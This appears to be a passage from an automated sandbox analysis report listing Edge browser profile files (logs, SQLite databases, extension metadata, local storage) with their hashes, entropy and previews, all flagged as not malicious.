                                                                                                                                                                                                                                                                                                                                                              SHA-256:D4EF6AF52D2B154984D0DC165A70BA77B66022EB58BA0F7CA83CCAA324DB9EDC
                                                                                                                                                                                                                                                                                                                                                              SHA-512:C9747D8C17895310A4B8D054B0B80E100CB3A5A4E882CD392C894FC27BF443237582C51EAA2C46207D5124D3E51487069FE2662C7C59FD536CC62A3D6355ECE7
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.819 17ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/02/18-02:16:42.820 17ac Recovering log #3.2025/02/18-02:16:42.823 17ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.227316910272456
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf7LKQWM+q2PFi23oH+Tcwt865IFUtFfAZG1Zmw7f++QWMVkwOFi23oH+TcwtD:7zLv+vdZYeb/WFUtn1/ajV5wZYeb/+SJ
                                                                                                                                                                                                                                                                                                                                                              MD5:992063D54E06B9DC43A7BF0B6A518FE5
                                                                                                                                                                                                                                                                                                                                                              SHA1:AE1CB893FB7255D45053A8C529931F4FB0584B34
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D4EF6AF52D2B154984D0DC165A70BA77B66022EB58BA0F7CA83CCAA324DB9EDC
                                                                                                                                                                                                                                                                                                                                                              SHA-512:C9747D8C17895310A4B8D054B0B80E100CB3A5A4E882CD392C894FC27BF443237582C51EAA2C46207D5124D3E51487069FE2662C7C59FD536CC62A3D6355ECE7
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.819 17ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/02/18-02:16:42.820 17ac Recovering log #3.2025/02/18-02:16:42.823 17ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                                                              MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                                                              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                                                              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.226963682043042
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXflcRpVq2PFi23oH+Tcwt8NIFUtFflc0bgZmw7fXIkwOFi23oH+Tcwt8+eLJ:7NcRpVvdZYebpFUtbcag/LI5wZYebqJ
                                                                                                                                                                                                                                                                                                                                                              MD5:D2D3B3C613CE50757CD7C1C9FFE36DB3
                                                                                                                                                                                                                                                                                                                                                              SHA1:C8B557518E6C4FDAED7B999461021ED391298E3D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BE4AA11C8390DECD6B0D59127F3EC35154AF6576246EAB6A33385B8582794B59
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9927EEB81AC433C24CF4780DDAB066E84ABD4BC4EA0059139EEB2D1109064CC01CB59E9D9A04F0C8A305C62DD3401779BA10975139A1FE76DF7722B17852242D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.394 16f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/02/18-02:16:43.399 16f0 Recovering log #3.2025/02/18-02:16:43.403 16f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.226963682043042
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXflcRpVq2PFi23oH+Tcwt8NIFUtFflc0bgZmw7fXIkwOFi23oH+Tcwt8+eLJ:7NcRpVvdZYebpFUtbcag/LI5wZYebqJ
                                                                                                                                                                                                                                                                                                                                                              MD5:D2D3B3C613CE50757CD7C1C9FFE36DB3
                                                                                                                                                                                                                                                                                                                                                              SHA1:C8B557518E6C4FDAED7B999461021ED391298E3D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:BE4AA11C8390DECD6B0D59127F3EC35154AF6576246EAB6A33385B8582794B59
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9927EEB81AC433C24CF4780DDAB066E84ABD4BC4EA0059139EEB2D1109064CC01CB59E9D9A04F0C8A305C62DD3401779BA10975139A1FE76DF7722B17852242D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.394 16f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/02/18-02:16:43.399 16f0 Recovering log #3.2025/02/18-02:16:43.403 16f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                                                              MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                                                              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 12, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24576
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.849563992296663
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:+Bmw6fU1zBf9tMF296YzcBBD5mloBWdhXPfEOcWddWSaDPZXhlnvLmN3HiHQ:+BCyf9tMc96yO86Wdtf0RDPphgVOQ
                                                                                                                                                                                                                                                                                                                                                              MD5:065BCC4FA6EDBB414132417E0CEB2CBF
                                                                                                                                                                                                                                                                                                                                                              SHA1:041801FCB1D265B4F33C6AA32CE895635C64828E
                                                                                                                                                                                                                                                                                                                                                              SHA-256:E9E9AD5197B19F4BA8FD7DB0BDA1532CDFF7D59209540AB6CC604D56782BAAC0
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DF2CEDC54979BF89D7105EF4797C07E8AF4F62599F224AB7915C694965D7766852AC63BD77C8B406B8AF8CAEBE10CB4A66862011AF6AFAF202C20183F6B0F6E3
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):155648
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.56976748658745
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:+qb9w4OnWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kEq0y9t:+qy4ZhH+bDo3iN0Z2TVJkXBBE3yb13
                                                                                                                                                                                                                                                                                                                                                              MD5:F22EDA1D8E77978BFC2D082928CCC821
                                                                                                                                                                                                                                                                                                                                                              SHA1:EE3CEE4ADD34B6BFE4B62CB0966C340F68717746
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D9668934BC8F20AC242FE7C58434AAA32285D92737C602C7D5AABC0FA84B2400
                                                                                                                                                                                                                                                                                                                                                              SHA-512:FCA33DEA3BCA7054455918EE5F5DF5D89CD8E2BD1CED54074AA3B38B0FCF2D53733BD49E305EC119722B3DE9D9DE785FBA81A11FA36E68F7FB4EF7178EB4B6E5
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8720
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:wBntFlljq7A/mhWJFuQ3yy7IOWUCtdQ/dweytllrE9SFcTp4AGbNCV9RUIHP:j75fOQw/d0Xi99pEYdP
                                                                                                                                                                                                                                                                                                                                                              MD5:6A580E0CD91B7E068DAB36B9A35EBC04
                                                                                                                                                                                                                                                                                                                                                              SHA1:447B12D46F1254CF0182E5BEE306BE1132307786
                                                                                                                                                                                                                                                                                                                                                              SHA-256:822CDEC5440D9DB562DF45349CB95670ECC3AD00DA3DEAF4E03DDCA57C591E0F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:94A5F387DEA97A51A12EDA5FF2E5169A344E2D65810EB6FE1AB82A9395914D87B5458D8E2318A0A80D498CE4381A58268805330140ED24B0FE0443FA5C623E05
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:............V.....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):45056
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.918414601255008
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:jj9P0PQkQerkjly773pLDcIgam6IkP/Kbt/RKToaADhf:jdUe2mly7O/UP/iRKc39
                                                                                                                                                                                                                                                                                                                                                              MD5:5AB92321902A0ABFA27D09411BAC43DB
                                                                                                                                                                                                                                                                                                                                                              SHA1:26F9287A309CEC9D52CF6BA78E1EC8A2CAC71DB6
                                                                                                                                                                                                                                                                                                                                                              SHA-256:EE4D9D5BBE4C844F47CCFE3909E15AE2FC4FAC945DC279969F93CF94ACA58C95
                                                                                                                                                                                                                                                                                                                                                              SHA-512:971AFC8CD4F487D0FA8C4B0318C4443192B6FFE7EE2E51B204F3D66A6212746436DDCD00B22F116741EED02FFF4D99BD1D349B37C8F70687E791DE9E1CAF2E80
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):404
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.261641653467914
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7U9+vdZYeb8rcHEZrELFUtOJ/d9V5wZYeb8rcHEZrEZSJ:7UKbYeb8nZrExgOrVgYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                                                              MD5:FACD4AAF9A59A927C2776FE762C6B822
                                                                                                                                                                                                                                                                                                                                                              SHA1:14F7A899BCB4A456B961C6DBA3DBEC921B89DE7C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:43B493E8E9BDC11A1FEDB97C64EF526CEDD7E11AE16C08E6CCFABE3D0BA086F5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:6335BF72BA74CFCE6FB3428F2FC2574129336F6B87ECF60EE971B34F7761E40D012ED5540FE4741BCEE08C4A860C7DB598A26E0C5522BDD0E5FD23C638353818
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:51.211 134c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/02/18-02:16:51.211 134c Recovering log #3.2025/02/18-02:16:51.212 134c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):404
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.261641653467914
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7U9+vdZYeb8rcHEZrELFUtOJ/d9V5wZYeb8rcHEZrEZSJ:7UKbYeb8nZrExgOrVgYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                                                              MD5:FACD4AAF9A59A927C2776FE762C6B822
                                                                                                                                                                                                                                                                                                                                                              SHA1:14F7A899BCB4A456B961C6DBA3DBEC921B89DE7C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:43B493E8E9BDC11A1FEDB97C64EF526CEDD7E11AE16C08E6CCFABE3D0BA086F5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:6335BF72BA74CFCE6FB3428F2FC2574129336F6B87ECF60EE971B34F7761E40D012ED5540FE4741BCEE08C4A860C7DB598A26E0C5522BDD0E5FD23C638353818
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:51.211 134c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/02/18-02:16:51.211 134c Recovering log #3.2025/02/18-02:16:51.212 134c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10084
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.011775624900796
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:muMNLd/H6NsyBGoIOjq/Nr+ao0ri0FnHl16OVp6/X:hMNRH6JBGo1q/qGL6OVy
                                                                                                                                                                                                                                                                                                                                                              MD5:02414F8FBAB14DCD2AE366D84C994171
                                                                                                                                                                                                                                                                                                                                                              SHA1:D316C529F2C6BD0DFD7981F23088EE8B7CE1EA1A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3B898D7F11DB487F6FA07C8502DF969642517D003C7F15A16AED398E9BC3FCB0
                                                                                                                                                                                                                                                                                                                                                              SHA-512:1A946A1DD0C00ED32ECAF68A8F45186E365A63E5E1E7B4E2FFF8CF932AA4C45ED5E657C390E7404B8F91C6FC49BBDE6FF3E6BE1491CBA21F01B46B6EFA757C7D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:&uW`.................VERSION.1..META:https://www.scribd.com..............!_https://www.scribd.com.._li_duid).4b59e25de34b--01jmbynct8prdw2s64049er0q5.._https://www.scribd.com.._li_ssM.CjcKBQgKEI0aCgYI3QEQjRoKBgiBARCNGgoGCKIBEI0aCgYI0gEQjRoKBgiAAhCPGgoGCOEBEI0a. _https://www.scribd.com.._uetsid!.5400bc60edc811efb67ac105b885219e.$_https://www.scribd.com.._uetsid_exp..Wed, 19 Feb 2025 07:16:53 GMT. _https://www.scribd.com.._uetvid!.540131b0edc811efaaf743fb8adffd57.$_https://www.scribd.com.._uetvid_exp..Sun, 15 Mar 2026 07:16:53 GMT.-_https://www.scribd.com..lastExternalReferrer..empty.1_https://www.scribd.com..lastExternalReferrerTime..1739863014730.,_https://www.scribd.com..0.24179741881168537.0_https://www.scribd.com..spdt-1739863011.375-688.._https://www.scribd.com..test.~.O................META:https://m.stripe.network."_https://m.stripe.network..muffinsE.Y..#.........C.....META:https://www.scribd.com..........;.#_https://www.scribd.com..33acrossId...v1.0013300001cFpYHAA0.1038.AtjE%

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1884884233228865
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf80Vq2PFi23oH+Tcwt8a2jMGIFUtFfZ0gZmw7f0nSIkwOFi23oH+Tcwt8a2jz:7E0VvdZYeb8EFUtz0g/YnSI5wZYeb8bJ
                                                                                                                                                                                                                                                                                                                                                              MD5:EE5C797330A33EE2E161602BFC6BCD95
                                                                                                                                                                                                                                                                                                                                                              SHA1:5A2B2F4151DED8DCA2639EFAD3E8C5CE3D9E554F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A4629A7A47883E0A67B9C7F20B8ECB18ED19A008DD1429D047C3DE72F4F36A16
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E9535E597BEAC160DD0872F1E751F591F469BBBCFD438F5DBE948812AFF1CB948C7ADAAD574C2B67C226FF3251D741BC69CF0009F15D993997B7E9596C4842DC
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.214 1fd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/02/18-02:16:43.215 1fd4 Recovering log #3.2025/02/18-02:16:43.218 1fd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1884884233228865
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf80Vq2PFi23oH+Tcwt8a2jMGIFUtFfZ0gZmw7f0nSIkwOFi23oH+Tcwt8a2jz:7E0VvdZYeb8EFUtz0g/YnSI5wZYeb8bJ
                                                                                                                                                                                                                                                                                                                                                              MD5:EE5C797330A33EE2E161602BFC6BCD95
